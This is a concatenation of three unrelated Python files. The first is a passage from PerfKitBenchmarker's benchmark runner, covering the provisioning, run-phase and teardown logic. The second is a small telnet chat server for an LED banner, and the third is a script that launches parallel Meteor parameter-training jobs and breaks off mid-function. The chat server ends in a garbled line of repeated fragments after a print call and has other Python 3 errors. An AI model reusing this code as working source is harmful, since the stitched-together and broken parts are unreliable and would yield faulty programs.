matches: regex string or None. Filters help to only those whose name matched
the regex. If None then all flags are printed.
Eg:
* all flags: `./pkb.py --helpmatchmd .*` > testsuite_docs/all.md
* linux benchmarks: `./pkb.py --helpmatchmd linux_benchmarks.*` >
testsuite_docs/linux_benchmarks.md * specific modules `./pkb.py
--helpmatchmd iperf` > testsuite_docs/iperf.md * windows packages
`./pkb.py --helpmatchmd windows_packages.*` >
testsuite_docs/windows_packages.md
* GCP provider: `./pkb.py --helpmatchmd providers.gcp.* >
testsuite_docs/providers_gcp.md`
"""
flags_by_module = FLAGS.flags_by_module_dict()
modules = sorted(flags_by_module)
regex = re.compile(matches)
for module_name in modules:
if regex.search(module_name):
# Compile regex patterns.
module_regex = re.compile(MODULE_REGEX)
flags_regex = re.compile(FLAGS_REGEX, re.MULTILINE | re.DOTALL)
flagname_regex = re.compile(FLAGNAME_REGEX, re.MULTILINE | re.DOTALL)
docstring_regex = re.compile(DOCSTRING_REGEX, re.MULTILINE | re.DOTALL)
# Retrieve the helpmatch text to format.
helptext_raw = FLAGS.module_help(module_name)
# Converts module name to github linkable string.
# eg: perfkitbenchmarker.linux_benchmarks.iperf_vpn_benchmark ->
# perfkitbenchmarker/linux_benchmarks/iperf_vpn_benchmark.py
module = re.search(
module_regex,
helptext_raw,
).group(1)
module_link = module.replace('.', '/') + '.py'
# Put flag name in a markdown code block for visibility.
flags = re.findall(flags_regex, helptext_raw)
flags[:] = [flagname_regex.sub(r'`\1`\2', flag) for flag in flags]
# Get the docstring for the module without importing everything into our
# namespace. Probably a better way to do this
docstring = 'No description available'
# Only pull doststrings from inside pkb source files.
if isfile(module_link):
with open(module_link, 'r') as f:
source = f.read()
# Get the triple quoted matches.
docstring_match = re.search(docstring_regex, source)
# Some modules don't have docstrings.
# eg perfkitbenchmarker/providers/alicloud/flags.py
if docstring_match is not None:
docstring = docstring_match.group(1)
# Format output and print here.
if isfile(module_link): # Only print links for modules we can find.
print('### [' + module, '](' + BASE_RELATIVE + module_link + ')\n')
else:
print('### ' + module + '\n')
print('#### Description:\n\n' + docstring + '\n\n#### Flags:\n')
print('\n'.join(flags) + '\n')
def CheckVersionFlag():
"""If the --version flag was specified, prints the version and exits."""
if FLAGS.version:
print(version.VERSION)
sys.exit(0)
def _InitializeRunUri():
"""Determines the PKB run URI and sets FLAGS.run_uri."""
if FLAGS.run_uri is None:
if stages.PROVISION in FLAGS.run_stage:
FLAGS.run_uri = str(uuid.uuid4())[-8:]
else:
# Attempt to get the last modified run directory.
run_uri = vm_util.GetLastRunUri()
if run_uri:
FLAGS.run_uri = run_uri
logging.warning(
'No run_uri specified. Attempting to run the following stages with '
'--run_uri=%s: %s', FLAGS.run_uri, ', '.join(FLAGS.run_stage))
else:
raise errors.Setup.NoRunURIError(
'No run_uri specified. Could not run the following stages: %s' %
', '.join(FLAGS.run_stage))
elif not FLAGS.run_uri.isalnum() or len(FLAGS.run_uri) > MAX_RUN_URI_LENGTH:
raise errors.Setup.BadRunURIError('run_uri must be alphanumeric and less '
'than or equal to %d characters in '
'length.' % MAX_RUN_URI_LENGTH)
def _CreateBenchmarkSpecs():
"""Create a list of BenchmarkSpecs for each benchmark run to be scheduled.
Returns:
A list of BenchmarkSpecs.
"""
specs = []
benchmark_tuple_list = benchmark_sets.GetBenchmarksFromFlags()
benchmark_counts = collections.defaultdict(itertools.count)
for benchmark_module, user_config in benchmark_tuple_list:
# Construct benchmark config object.
name = benchmark_module.BENCHMARK_NAME
expected_os_types = None if FLAGS.multi_os_benchmark else (
os_types.WINDOWS_OS_TYPES if FLAGS.os_type in os_types.WINDOWS_OS_TYPES
else os_types.LINUX_OS_TYPES)
with flag_util.OverrideFlags(FLAGS, user_config.get('flags')):
config_dict = benchmark_module.GetConfig(user_config)
config_spec_class = getattr(
benchmark_module, 'BENCHMARK_CONFIG_SPEC_CLASS',
benchmark_config_spec.BenchmarkConfigSpec)
config = config_spec_class(name, expected_os_types=expected_os_types,
flag_values=FLAGS, **config_dict)
# Assign a unique ID to each benchmark run. This differs even between two
# runs of the same benchmark within a single PKB run.
uid = name + str(next(benchmark_counts[name]))
# Optional step to check flag values and verify files exist.
check_prereqs = getattr(benchmark_module, 'CheckPrerequisites', None)
if check_prereqs:
try:
with config.RedirectFlags(FLAGS):
check_prereqs(config)
except:
logging.exception('Prerequisite check failed for %s', name)
raise
specs.append(benchmark_spec.BenchmarkSpec.GetBenchmarkSpec(
benchmark_module, config, uid))
return specs
def _WriteCompletionStatusFile(benchmark_specs, status_file):
"""Writes a completion status file.
The file has one json object per line, each with the following format:
{
"name": <benchmark name>,
"status": <completion status>,
"failed_substatus": <failed substatus>,
"status_detail": <descriptive string (if present)>,
"flags": <flags dictionary>
}
Args:
benchmark_specs: The list of BenchmarkSpecs that ran.
status_file: The file object to write the json structures to.
"""
for spec in benchmark_specs:
# OrderedDict so that we preserve key order in json file
status_dict = collections.OrderedDict()
status_dict['name'] = spec.name
status_dict['status'] = spec.status
if spec.failed_substatus:
status_dict['failed_substatus'] = spec.failed_substatus
if spec.status_detail:
status_dict['status_detail'] = spec.status_detail
status_dict['flags'] = spec.config.flags
status_file.write(json.dumps(status_dict) + '\n')
def DoProvisionPhase(spec, timer):
"""Performs the Provision phase of benchmark execution.
Args:
spec: The BenchmarkSpec created for the benchmark.
timer: An IntervalTimer that measures the start and stop times of resource
provisioning.
"""
if FLAGS.create_started_run_sample:
PublishRunStartedSample(spec)
logging.info('Provisioning resources for benchmark %s', spec.name)
spec.ConstructContainerCluster()
spec.ConstructContainerRegistry()
# spark service needs to go first, because it adds some vms.
spec.ConstructSparkService()
spec.ConstructDpbService()
spec.ConstructVirtualMachines()
spec.ConstructRelationalDb()
# CapacityReservations need to be constructed after VirtualMachines because
# it needs information about the VMs (machine type, count, zone, etc). The
# CapacityReservations will be provisioned before VMs.
spec.ConstructCapacityReservations()
spec.ConstructTpu()
spec.ConstructEdwService()
spec.ConstructVPNService()
spec.ConstructNfsService()
spec.ConstructSmbService()
# Pickle the spec before we try to create anything so we can clean
# everything up on a second run if something goes wrong.
spec.Pickle()
events.benchmark_start.send(benchmark_spec=spec)
try:
with timer.Measure('Resource Provisioning'):
spec.Provision()
finally:
# Also pickle the spec after the resources are created so that
# we have a record of things like AWS ids. Otherwise we won't
# be able to clean them up on a subsequent run.
spec.Pickle()
class InterruptChecker():
"""An class that check interrupt on VM."""
def __init__(self, vms):
"""Start check interrupt thread.
Args:
vms: A list of virtual machines.
"""
self.vms = vms
self.check_threads = []
self.phase_status = threading.Event()
for vm in vms:
if vm.IsInterruptible():
check_thread = threading.Thread(target=self.CheckInterrupt, args=(vm,))
check_thread.start()
self.check_threads.append(check_thread)
def CheckInterrupt(self, vm):
"""Check interrupt.
Args:
vm: the virtual machine object.
Returns:
None
"""
while not self.phase_status.isSet():
vm.UpdateInterruptibleVmStatus()
if vm.WasInterrupted():
return
else:
self.phase_status.wait(vm.GetPreemptibleStatusPollSeconds())
def EndCheckInterruptThread(self):
"""End check interrupt thread."""
self.phase_status.set()
for check_thread in self.check_threads:
check_thread.join()
def EndCheckInterruptThreadAndRaiseError(self):
"""End check interrupt thread and raise error.
Raises:
InsufficientCapacityCloudFailure when it catches interrupt.
Returns:
None
"""
self.EndCheckInterruptThread()
if any(vm.IsInterruptible() and vm.WasInterrupted() for vm in self.vms):
raise errors.Benchmarks.InsufficientCapacityCloudFailure('Interrupt')
def DoPreparePhase(spec, timer):
"""Performs the Prepare phase of benchmark execution.
Args:
spec: The BenchmarkSpec created for the benchmark.
timer: An IntervalTimer that measures the start and stop times of the
benchmark module's Prepare function.
"""
logging.info('Preparing benchmark %s', spec.name)
with timer.Measure('BenchmarkSpec Prepare'):
spec.Prepare()
with timer.Measure('Benchmark Prepare'):
spec.BenchmarkPrepare(spec)
spec.StartBackgroundWorkload()
if FLAGS.after_prepare_sleep_time:
logging.info('Sleeping for %s seconds after the prepare phase.',
FLAGS.after_prepare_sleep_time)
time.sleep(FLAGS.after_prepare_sleep_time)
def DoRunPhase(spec, collector, timer):
"""Performs the Run phase of benchmark execution.
Args:
spec: The BenchmarkSpec created for the benchmark.
collector: The SampleCollector object to add samples to.
timer: An IntervalTimer that measures the start and stop times of the
benchmark module's Run function.
"""
if FLAGS.before_run_pause:
six.moves.input('Hit enter to begin Run.')
deadline = time.time() + FLAGS.run_stage_time
run_number = 0
consecutive_failures = 0
last_publish_time = time.time()
def _IsRunStageFinished():
if FLAGS.run_stage_time > 0:
return time.time() > deadline
else:
return run_number >= FLAGS.run_stage_iterations
while True:
samples = []
logging.info('Running benchmark %s', spec.name)
events.before_phase.send(events.RUN_PHASE, benchmark_spec=spec)
try:
with timer.Measure('Benchmark Run'):
samples = spec.BenchmarkRun(spec)
except Exception:
consecutive_failures += 1
if consecutive_failures > FLAGS.run_stage_retries:
raise
logging.exception('Run failed (consecutive_failures=%s); retrying.',
consecutive_failures)
else:
consecutive_failures = 0
finally:
events.after_phase.send(events.RUN_PHASE, benchmark_spec=spec)
if FLAGS.run_stage_time or FLAGS.run_stage_iterations:
for s in samples:
s.metadata['run_number'] = run_number
# Add boot time metrics on the first run iteration.
if run_number == 0 and (FLAGS.boot_samples or
spec.name == cluster_boot_benchmark.BENCHMARK_NAME):
samples.extend(cluster_boot_benchmark.GetTimeToBoot(spec.vms))
if FLAGS.record_lscpu:
samples.extend(_CreateLscpuSamples(spec.vms))
if FLAGS.record_proccpu:
samples.extend(_CreateProcCpuSamples(spec.vms))
if FLAGS.record_cpu_vuln and run_number == 0:
samples.extend(_CreateCpuVulnerabilitySamples(spec.vms))
events.samples_created.send(
events.RUN_PHASE, benchmark_spec=spec, samples=samples)
collector.AddSamples(samples, spec.name, spec)
if (FLAGS.publish_after_run and FLAGS.publish_period is not None and
FLAGS.publish_period < (time.time() - last_publish_time)):
collector.PublishSamples()
last_publish_time = time.time()
run_number += 1
if _IsRunStageFinished():
if FLAGS.after_run_sleep_time:
logging.info('Sleeping for %s seconds after the run phase.',
FLAGS.after_run_sleep_time)
time.sleep(FLAGS.after_run_sleep_time)
break
def DoCleanupPhase(spec, timer):
"""Performs the Cleanup phase of benchmark execution.
Cleanup phase work should be delegated to spec.BenchmarkCleanup to allow
non-PKB based cleanup if needed.
Args:
spec: The BenchmarkSpec created for the benchmark.
timer: An IntervalTimer that measures the start and stop times of the
benchmark module's Cleanup function.
"""
if FLAGS.before_cleanup_pause:
six.moves.input('Hit enter to begin Cleanup.')
logging.info('Cleaning up benchmark %s', spec.name)
if (spec.always_call_cleanup or any([vm.is_static for vm in spec.vms]) or
spec.dpb_service is not None):
spec.StopBackgroundWorkload()
with timer.Measure('Benchmark Cleanup'):
spec.BenchmarkCleanup(spec)
def DoTeardownPhase(spec, timer):
"""Performs the Teardown phase of benchmark execution.
Teardown phase work should be delegated to spec.Delete to allow non-PKB based
teardown if needed.
Args:
spec: The BenchmarkSpec created for the benchmark.
timer: An IntervalTimer that measures the start and stop times of
resource teardown.
"""
logging.info('Tearing down resources for benchmark %s', spec.name)
with timer.Measure('Resource Teardown'):
spec.Delete()
def _SkipPendingRunsFile():
if FLAGS.skip_pending_runs_file and isfile(FLAGS.skip_pending_runs_file):
logging.warning('%s exists. Skipping benchmark.',
FLAGS.skip_pending_runs_file)
return True
else:
return False
_SKIP_PENDING_RUNS_CHECKS = []
def RegisterSkipPendingRunsCheck(func):
"""Registers a function to skip pending runs.
Args:
func: A function which returns True if pending runs should be skipped.
"""
_SKIP_PENDING_RUNS_CHECKS.append(func)
def PublishRunStartedSample(spec):
"""Publishes a sample indicating that a run has started.
This sample is published immediately so that there exists some metric for any
run (even if the process dies).
Args:
spec: The BenchmarkSpec object with run information.
"""
collector = SampleCollector()
metadata = {
'flags': str(flag_util.GetProvidedCommandLineFlags())
}
collector.AddSamples(
[sample.Sample('Run Started', 1, 'Run Started', metadata)],
spec.name, spec)
collector.PublishSamples()
def RunBenchmark(spec, collector):
"""Runs a single benchmark and adds the results to the collector.
Args:
spec: The BenchmarkSpec object with run information.
collector: The SampleCollector object to add samples to.
"""
# Since there are issues with the handling SIGINT/KeyboardInterrupt (see
# further discussion in _BackgroundProcessTaskManager) this mechanism is
# provided for defense in depth to force skip pending runs after SIGINT.
for f in _SKIP_PENDING_RUNS_CHECKS:
if f():
logging.warning('Skipping benchmark.')
return
spec.status = benchmark_status.FAILED
current_run_stage = stages.PROVISION
# Modify the logger prompt for messages logged within this function.
label_extension = '{}({}/{})'.format(
spec.name, spec.sequence_number, spec.total_benchmarks)
context.SetThreadBenchmarkSpec(spec)
log_context = log_util.GetThreadLogContext()
with log_context.ExtendLabel(label_extension):
with spec.RedirectGlobalFlags():
end_to_end_timer = timing_util.IntervalTimer()
detailed_timer = timing_util.IntervalTimer()
interrupt_checker = None
try:
with end_to_end_timer.Measure('End to End'):
if stages.PROVISION in FLAGS.run_stage:
DoProvisionPhase(spec, detailed_timer)
if stages.PREPARE in FLAGS.run_stage:
current_run_stage = stages.PREPARE
interrupt_checker = InterruptChecker(spec.vms)
DoPreparePhase(spec, detailed_timer)
interrupt_checker.EndCheckInterruptThreadAndRaiseError()
interrupt_checker = None
if stages.RUN in FLAGS.run_stage:
current_run_stage = stages.RUN
interrupt_checker = InterruptChecker(spec.vms)
DoRunPhase(spec, collector, detailed_timer)
interrupt_checker.EndCheckInterruptThreadAndRaiseError()
interrupt_checker = None
if stages.CLEANUP in FLAGS.run_stage:
current_run_stage = stages.CLEANUP
interrupt_checker = InterruptChecker(spec.vms)
DoCleanupPhase(spec, detailed_timer)
interrupt_checker.EndCheckInterruptThreadAndRaiseError()
interrupt_checker = None
if stages.TEARDOWN in FLAGS.run_stage:
current_run_stage = stages.TEARDOWN
DoTeardownPhase(spec, detailed_timer)
# Add timing samples.
if (FLAGS.run_stage == stages.STAGES and
timing_util.EndToEndRuntimeMeasurementEnabled()):
collector.AddSamples(
end_to_end_timer.GenerateSamples(), spec.name, spec)
if timing_util.RuntimeMeasurementsEnabled():
collector.AddSamples(
detailed_timer.GenerateSamples(), spec.name, spec)
# Add resource related samples.
collector.AddSamples(spec.GetSamples(), spec.name, spec)
except Exception as e:
# Log specific type of failure, if known
# TODO(dlott) Move to exception chaining with Python3 support
if (isinstance(e, errors.Benchmarks.InsufficientCapacityCloudFailure)
or 'InsufficientCapacityCloudFailure' in str(e)):
spec.failed_substatus = (
benchmark_status.FailedSubstatus.INSUFFICIENT_CAPACITY)
spec.status_detail = str(e)
elif (isinstance(e, errors.Benchmarks.QuotaFailure)
or 'QuotaFailure' in str(e)):
spec.failed_substatus = benchmark_status.FailedSubstatus.QUOTA
spec.status_detail = str(e)
elif isinstance(e, errors.Benchmarks.KnownIntermittentError):
spec.failed_substatus = (
benchmark_status.FailedSubstatus.KNOWN_INTERMITTENT)
spec.status_detail = str(e)
# Resource cleanup (below) can take a long time. Log the error to give
# immediate feedback, then re-throw.
logging.exception('Error during benchmark %s', spec.name)
if FLAGS.create_failed_run_samples:
collector.AddSamples(MakeFailedRunSample(
spec, str(e), current_run_stage), spec.name, spec)
# If the particular benchmark requests us to always call cleanup, do it
# here.
if stages.CLEANUP in FLAGS.run_stage and spec.always_call_cleanup:
DoCleanupPhase(spec, detailed_timer)
if (FLAGS.always_teardown_on_exception and
stages.TEARDOWN not in FLAGS.run_stage):
# Note that if TEARDOWN is specified, it will happen below.
DoTeardownPhase(spec, detailed_timer)
raise
finally:
if interrupt_checker:
interrupt_checker.EndCheckInterruptThread()
# Deleting resources should happen first so any errors with publishing
# don't prevent teardown.
if stages.TEARDOWN in FLAGS.run_stage:
spec.Delete()
if FLAGS.publish_after_run:
collector.PublishSamples()
events.benchmark_end.send(benchmark_spec=spec)
# Pickle spec to save final resource state.
spec.Pickle()
spec.status = benchmark_status.SUCCEEDED
def MakeFailedRunSample(spec, error_message, run_stage_that_failed):
"""Create a sample.Sample representing a failed run stage.
The sample metric will have the name 'Run Failed';
the value will be 1 (has to be convertible to a float),
and the unit will be 'Run Failed' (for lack of a better idea).
The sample metadata will include the error message from the
Exception, the run stage that failed, as well as all PKB
command line flags that were passed in.
Args:
spec: benchmark_spec
error_message: error message that was caught, resulting in the
run stage failure.
run_stage_that_failed: run stage that failed by raising an Exception
Returns:
a sample.Sample representing the run stage failure.
"""
# Note: currently all provided PKB command line flags are included in the
# metadata. We may want to only include flags specific to the benchmark that
# failed. This can be acomplished using gflag's FlagsByModuleDict().
metadata = {
'error_message': error_message[0:FLAGS.failed_run_samples_error_length],
'run_stage': run_stage_that_failed,
'flags': str(flag_util.GetProvidedCommandLineFlags())
}
# Check for preempted VMs
def UpdateVmStatus(vm):
# Setting vm.is_failed_run to True, UpdateInterruptibleVmStatus knows this
# is the final interruption checking. GCP only needs to check interruption
# when fail happens. For the the other clouds, PKB needs to check while vm
# is alive.
vm.is_failed_run = True
vm.UpdateInterruptibleVmStatus()
vm_util.RunThreaded(UpdateVmStatus, spec.vms)
interruptible_vm_count = 0
interrupted_vm_count = 0
vm_status_codes = []
for vm in spec.vms:
if vm.IsInterruptible():
interruptible_vm_count += 1
if vm.WasInterrupted():
interrupted_vm_count += 1
spec.failed_substatus = (
benchmark_status.FailedSubstatus.INTERRUPTED)
status_code = vm.GetVmStatusCode()
if status_code:
vm_status_codes.append(status_code)
if spec.failed_substatus:
metadata['failed_substatus'] = spec.failed_substatus
if interruptible_vm_count:
metadata.update({'interruptible_vms': interruptible_vm_count,
'interrupted_vms': interrupted_vm_count,
'vm_status_codes': vm_status_codes})
if interrupted_vm_count:
logging.error(
'%d interruptible VMs were interrupted in this failed PKB run.',
interrupted_vm_count)
return [sample.Sample('Run Failed', 1, 'Run Failed', metadata)]
def RunBenchmarkTask(spec):
"""Task that executes RunBenchmark.
This is designed to be used with RunParallelProcesses.
Arguments:
spec: BenchmarkSpec. The spec to call RunBenchmark with.
Returns:
A tuple of BenchmarkSpec, list of samples.
"""
if _TEARDOWN_EVENT.is_set():
return spec, []
# Many providers name resources using run_uris. When running multiple
# benchmarks in parallel, this causes name collisions on resources.
# By modifying the run_uri, we avoid the collisions.
if FLAGS.run_processes and FLAGS.run_processes > 1:
spec.config.flags['run_uri'] = FLAGS.run_uri + str(spec.sequence_number)
# Unset run_uri so the config value takes precedence.
FLAGS['run_uri'].present = 0
collector = SampleCollector()
try:
RunBenchmark(spec, collector)
except BaseException as e:
logging.exception('Exception running benchmark')
msg = 'Benchmark {0}/{1} {2} (UID: {3}) failed.'.format(
spec.sequence_number, spec.total_benchmarks, spec.name, spec.uid)
if isinstance(e, KeyboardInterrupt) or FLAGS.stop_after_benchmark_failure:
logging.error('%s Execution will not continue.', msg)
_TEARDOWN_EVENT.set()
else:
logging.error('%s Execution will continue.', msg)
finally:
# We need to return both the spec and samples so that we know
# the status of the test and can publish any samples that
# haven't yet been published.
return spec, collector.samples
def _LogCommandLineFlags():
result = []
for name in FLAGS:
flag = FLAGS[name]
if flag.present:
result.append(flag.serialize())
logging.info('Flag values:\n%s', '\n'.join(result))
def SetUpPKB():
"""Set globals and environment variables for PKB.
After SetUpPKB() returns, it should be possible to call PKB
functions, like benchmark_spec.Prepare() or benchmark_spec.Run().
SetUpPKB() also modifies the local file system by creating a temp
directory and storing new SSH keys.
"""
try:
_InitializeRunUri()
except errors.Error as e:
logging.error(e)
sys.exit(1)
# Initialize logging.
vm_util.GenTempDir()
if FLAGS.use_pkb_logging:
log_util.ConfigureLogging(
stderr_log_level=log_util.LOG_LEVELS[FLAGS.log_level],
log_path=vm_util.PrependTempDir(LOG_FILE_NAME),
run_uri=FLAGS.run_uri,
file_log_level=log_util.LOG_LEVELS[FLAGS.file_log_level])
logging.info('PerfKitBenchmarker version: %s', version.VERSION)
# Translate deprecated flags and log all provided flag values.
disk.WarnAndTranslateDiskFlags()
_LogCommandLineFlags()
# Register skip pending runs functionality.
RegisterSkipPendingRunsCheck(_SkipPendingRunsFile)
# Check environment.
if not FLAGS.ignore_package_requirements:
requirements.CheckBasicRequirements()
for executable in REQUIRED_EXECUTABLES:
if not vm_util.ExecutableOnPath(executable):
raise errors.Setup.MissingExecutableError(
'Could not find required executable "%s"' % executable)
# Check mutually exclusive flags
if FLAGS.run_stage_iterations > 1 and FLAGS.run_stage_time > 0:
raise errors.Setup.InvalidFlagConfigurationError(
'Flags run_stage_iterations and run_stage_time are mutually exclusive')
vm_util.SSHKeyGen()
if FLAGS.static_vm_file:
with open(FLAGS.static_vm_file) as fp:
static_virtual_machine.StaticVirtualMachine.ReadStaticVirtualMachineFile(
fp)
events.initialization_complete.send(parsed_flags=FLAGS)
benchmark_lookup.SetBenchmarkModuleFunction(benchmark_sets.BenchmarkModule)
package_lookup.SetPackageModuleFunction(benchmark_sets.PackageModule)
# Update max_concurrent_threads to use at least as many threads as VMs. This
# is important for the cluster_boot benchmark where we want to launch the VMs
# in parallel.
if not FLAGS.max_concurrent_threads:
FLAGS.max_concurrent_threads = max(
background_tasks.MAX_CONCURRENT_THREADS,
FLAGS.num_vms)
logging.info('Setting --max_concurrent_threads=%d.',
FLAGS.max_concurrent_threads)
def RunBenchmarkTasksInSeries(tasks):
"""Runs benchmarks in series.
Arguments:
tasks: list of tuples of task: [(RunBenchmarkTask, (spec,), {}),]
Returns:
list of tuples of func results
"""
return [func(*args, **kwargs) for func, args, kwargs in tasks]
def RunBenchmarks():
"""Runs all benchmarks in PerfKitBenchmarker.
Returns:
Exit status for the process.
"""
benchmark_specs = _CreateBenchmarkSpecs()
if FLAGS.randomize_run_order:
random.shuffle(benchmark_specs)
if FLAGS.dry_run:
print('PKB will run with the following configurations:')
for spec in benchmark_specs:
print(spec)
print('')
return 0
collector = SampleCollector()
try:
tasks = [(RunBenchmarkTask, (spec,), {})
for spec in benchmark_specs]
if FLAGS.run_processes is None:
spec_sample_tuples = RunBenchmarkTasksInSeries(tasks)
else:
spec_sample_tuples = background_tasks.RunParallelProcesses(
tasks, FLAGS.run_processes, FLAGS.run_processes_delay)
benchmark_specs, sample_lists = list(zip(*spec_sample_tuples))
for sample_list in sample_lists:
collector.samples.extend(sample_list)
finally:
if collector.samples:
collector.PublishSamples()
if benchmark_specs:
logging.info(benchmark_status.CreateSummary(benchmark_specs))
logging.info('Complete logs can be found at: %s',
vm_util.PrependTempDir(LOG_FILE_NAME))
logging.info('Completion statuses can be found at: %s',
vm_util.PrependTempDir(COMPLETION_STATUS_FILE_NAME))
if stages.TEARDOWN not in FLAGS.run_stage:
logging.info(
'To run again with this setup, please use --run_uri=%s', FLAGS.run_uri)
if FLAGS.archive_bucket:
archive.ArchiveRun(vm_util.GetTempDir(), FLAGS.archive_bucket,
gsutil_path=FLAGS.gsutil_path,
prefix=FLAGS.run_uri + '_')
# Write completion status file(s)
completion_status_file_name = (
vm_util.PrependTempDir(COMPLETION_STATUS_FILE_NAME))
with open(completion_status_file_name, 'w') as status_file:
_WriteCompletionStatusFile(benchmark_specs, status_file)
if FLAGS.completion_status_file:
with open(FLAGS.completion_status_file, 'w') as status_file:
_WriteCompletionStatusFile(benchmark_specs, status_file)
all_benchmarks_succeeded = all(spec.status == benchmark_status.SUCCEEDED
for spec in benchmark_specs)
return 0 if all_benchmarks_succeeded else 1
def _GenerateBenchmarkDocumentation():
"""Generates benchmark documentation to show in --help."""
benchmark_docs = []
for benchmark_module in (linux_benchmarks.BENCHMARKS +
windows_benchmarks.BENCHMARKS):
benchmark_config = configs.LoadMinimalConfig(
benchmark_module.BENCHMARK_CONFIG, benchmark_module.BENCHMARK_NAME)
vm_groups = benchmark_config.get('vm_groups', {})
total_vm_count = 0
vm_str = ''
scratch_disk_str = ''
for group in six.itervalues(vm_groups):
group_vm_count = group.get('vm_count', 1)
if group_vm_count is None:
vm_str = 'variable'
else:
total_vm_count += group_vm_count
if group.get('disk_spec'):
scratch_disk_str = ' with scratch volume(s)'
name = benchmark_module.BENCHMARK_NAME
if benchmark_module in windows_benchmarks.BENCHMARKS:
name += ' (Windows)'
benchmark_docs.append('%s: %s (%s VMs%s)' %
(name,
benchmark_config['description'],
vm_str or total_vm_count,
scratch_disk_str))
return '\n\t'.join(benchmark_docs)
def _CreateLscpuSamples(vms):
"""Creates samples from linux VMs of lscpu output."""
samples = []
for vm in vms:
if vm.OS_TYPE in os_types.LINUX_OS_TYPES:
metadata = {'node_name': vm.name}
metadata.update(vm.CheckLsCpu().data)
samples.append(sample.Sample('lscpu', 0, '', metadata))
return samples
def _CreateProcCpuSamples(vms):
"""Creates samples from linux VMs of lscpu output."""
samples = []
for vm in vms:
if vm.OS_TYPE not in os_types.LINUX_OS_TYPES:
continue
data = vm.CheckProcCpu()
metadata = {'node_name': vm.name}
metadata.update(data.GetValues())
samples.append(sample.Sample('proccpu', 0, '', metadata))
metadata = {'node_name': vm.name}
for processor_id, raw_values in data.mappings.items():
values = ['%s=%s' % item for item in raw_values.items()]
metadata['proc_{}'.format(processor_id)] = ';'.join(sorted(values))
samples.append(sample.Sample('proccpu_mapping', 0, '', metadata))
return samples
def _CreateCpuVulnerabilitySamples(vms) -> List[sample.Sample]:
"""Returns samples of the VMs' CPU vulernabilites."""
def CreateSample(vm) -> Optional[sample.Sample]:
metadata = {'vm_name': vm.name}
metadata.update(vm.cpu_vulnerabilities.asdict)
return sample.Sample('cpu_vuln', 0, '', metadata)
linux_vms = [vm for vm in vms if vm.OS_TYPE in os_types.LINUX_OS_TYPES]
return vm_util.RunThreaded(CreateSample, linux_vms)
def Main():
log_util.ConfigureBasicLogging()
_InjectBenchmarkInfoIntoDocumentation()
_ParseFlags()
if FLAGS.helpmatch:
_PrintHelp(FLAGS.helpmatch)
return 0
if FLAGS.helpmatchmd:
_PrintHelpMD(FLAGS.helpmatchmd)
return 0
CheckVersionFlag()
SetUpPKB()
return RunBenchmarks()
|
pisocket.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# pisocket
# Telnet for sharing texts on LED banner
#
# see ../LICENSE file for licence
# see README.md for more info
# see CHANGELOG.md for detailed changes in each version
#
# (c) 2017 kj/P1X
#
import socket
import struct
import threading
import config
cfg = config.Config()
print('Starting PiSocket Server...')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((cfg.get_setting('server_ip'), cfg.get_setting('server_port')))
sock.listen(1)
print('[i] Server is running at {ip}:{port}'.format(
ip = cfg.get_setting('server_ip'),
port = str(cfg.get_setting('server_port'))))
clients = []
def handler(c, a):
global clients
global cfg
while True:
data = c.recv(1024)
for client in clients:
if not client == c:
client.send(cfg.get_msg('chat') + bytes(data) + cfg.get_msg('chat_reset'))
if not data:
clients.remove(c)
c.close()
for client in clients:
client.send(cfg.get_msg('disconnected'))
print(cfg.get_msg('disconnected'))
break
def format_msg(msg):
return bytes('{color}{msg}\n'.format(
color = cfg.get_style('info'),
msg = cfg.get_msg(msg)))
while True:
c, a = sock.accept()
thread = threading.Thread(target=handler,args=(c, a))
thread.daemon = True
thread.start()
clients.append(c)
for cli in clients:
cli.family
if not cli == c:
cli.send(cfg.get_msg('connected'))
else:
color = cfg.get_style('info'),
cli.send(cfg.get_msg('welcome'))
print(cfg.get_msg('connected')) color = cfg.get_style('info'), color = cfg.get_style('info'), color = cfg.get_style('info'),
|
meteor_shower.py
|
#!/usr/bin/env python
# Learn Meteor parameters quickly with up to 42 Meteors
# Run as many as requeted in parallel
# Meteors use 1 cpu / 2gb each
import collections, os, subprocess, sys, threading
def main(argv):
if len(argv[1:]) < 7:
print >> sys.stderr, 'Learn Meteor parameters efficiently with parallel Trainers'
print >> sys.stderr, 'Usage: {0} <meteor.jar> <lang> <n-mods> <task> <data_dir> <work_dir> <n-jobs> [other args like -a par.gz, -ch, ...]'.format(argv[0])
sys.exit(1)
# Args
meteor_jar = os.path.abspath(argv[1])
lang = argv[2]
n_mods = int(argv[3])
task = argv[4]
data_dir = os.path.abspath(argv[5])
work_dir = os.path.abspath(argv[6])
n_jobs = int(argv[7])
sb_dir = os.path.join(work_dir, 'sandbox')
other_args = argv[8:]
# Working dir
if os.path.exists(work_dir):
print 'Work dir {0} exists, exiting'.format(work_dir)
sys.exit(1)
os.mkdir(work_dir)
os.mkdir(sb_dir)
# Weight ranges for jobs based on mod count
w_start_list = [1, 0, 0, 0]
w_end_list = [1, 0, 0, 0]
for i in range(n_mods):
w_end_list[i] = 1
w_start = ''
w_end = ''
for i in range(4):
w_start += str(w_start_list[i]) + ' '
w_end += str(w_end_list[i]) + ' '
w_start = w_start.strip()
w_end = w_end.strip()
# Step is always the same
step = '0.05 0.10 0.05 0.05 1.0 0.2 0.2 0.2'
# Queue Trainer commands
queue = collections.deque([])
for i in range(42):
sb_sub_dir = os.path.join(sb_dir, '{0}'.format(i + 1))
os.mkdir(sb_sub_dir)
out_file = os.path.join(work_dir, 'output.{0}'.format(i + 1))
a = 0.05 * (i / 2)
(g_min, g_max) = (0, 0.5) if (i % 2 == 0) else (0.55, 1.0)
start = '{0} 0 {1} 0 {2}'.format(a, g_min, w_start)
end = '{0} 2.5 {1} 1.0 {2}'.format(a, g_max, w_end)
# Retry in case of filesystem failure
trainer_cmd = 'cd {sd} && while true ; do sleep 1 ; java -Xmx1G -cp {0} Trainer {1} {2} -l {3} -i \'{4}\' -f \'{5}\' -s \'{6}\' {args} > {7} ; if [ "$?" = "0" ] ; then break ; fi ; done'.format(meteor_jar, task, data_dir, lang, start, end, step, out_file, sd=sb_sub_dir, args=' '.join(other_args))
queue.append(trainer_cmd)
# Run Trainers
for i in range(n_jobs):
queue.append(-1)
threads = []
for i in range(n_jobs):
t = threading.Thread(target=run, args=(queue,))
threads.append(t)
t.start()
for t in threads:
t.join()
# Sort output
sort_cmd = 'cat {0}/output.* |sort -g -S4G --parallel={1} >{0}/output.sort'.format(work_dir, n_jobs)
